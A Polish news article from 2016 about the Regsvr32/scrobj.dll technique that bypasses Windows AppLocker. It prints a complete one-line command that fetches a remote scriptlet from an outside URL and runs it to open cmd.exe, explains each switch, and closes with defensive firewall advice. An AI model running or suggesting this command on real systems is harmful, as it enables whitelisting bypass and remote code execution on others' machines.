Regsvr32 uruchamia skrypty z Sieci. Jedną komendą złamiesz Windowsa
Być może to nie błąd, lecz po prostu niezamierzonafunkcjonalność Windowsa. Na pewno jednak odkryte przez CaseyaSmitha działanie systemowego narzędzia Regsvr32, przeznaczonego dorejestrowania plików DLL w Rejestrze wzbudzi spore zainteresowaniezarówno wśród cyberprzestępców, jak i np. uczniów w szkołach.Któż się spodziewał, że pozwoli ono całkowicie obejśćsystemowe zabezpieczenia i uruchamiać w Windowsie dowolne skrypty?
22.04.2016 19:34
AppLocker wykorzystywany jest już od czasów wprowadzenia narynek Windowsa 7 do blokowania użytkownikom dostępu doniepożądanych skryptów i aplikacji – i do tej pory byłskutecznym sposobem na zamknięcie „okienek”. Okazuje sięjednak, że Regsvr32 (Microsoft Register Server), będący podpisanąprzez Microsoft binarką, domyślnie obecną w systemie, pozwala napobranie z Sieci i uruchomienie dowolnego kodu w JavaScripcie lubVBScripcie i jego uruchomienie. Kod ten zaś może uruchomić dowolnąaplikację w systemie, omijając wszelkie zabezpieczenia Windowsa.
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
W przykładzie podanym przez The Register, który jako pierwszypoinformował o tej ciekawej możliwości, regsvr32 wywoływany jestz czterema przełącznikami. /s wycisza komunikaty, /n nakazuje niekorzystać z komponentu DllRegisterServer, /i przekazuje opcjonalnyparametr do funkcji DllInstall (tutaj skrypt, który nakazujeuruchomić konsolę CMD.exe) , zaś /u oznacza próbęodrejestrowania obiektu. Widoczna w wywołaniu biblioteka scrobj.dllto Microsoft Script Component Runtime.
Jeśli więc regsvr32 dostanie URL, pod którym znajdować siębędzie plik XML z uruchamialnym kodem, to pobierze go po HTTP lubHTTPS i uruchomi, poprzez próbę odrejestrowania pliku DLL. Nietrzeba tu żadnych specjalnych uprawnień, okna są szeroko otwartedla każdego.
Odkrywca tej „funkcjonalności”, która daje zupełnie nowemożliwości w dziedzinie penetrowania Windowsów, przygotował jużcały zbiór skryptów, które można w ten sposób uruchomić.Możecie je znaleźć naGitHubie – pomogą sprawdzić, na ile Wasze systemy są na topodatne.
Znany ekspert od systemów Microsoftu Alex Ionescu zachwyca sięodkryciem. To w końcu wbudowane w system zdalne uruchamianie kodubez uprawnień administratora, które omija mechanizm białych list,nie pozostawia śladów na dysku, nie dotyka Rejestru i można towszystko w dodatku schować w zaszyfrowanej sesji HTTPS. Jak do tejpory łatek nie ma. Jedyne co pozostaje administratorom, tozablokować dostęp do Sieci dla regsvr32 na poziomie zaporysieciowej.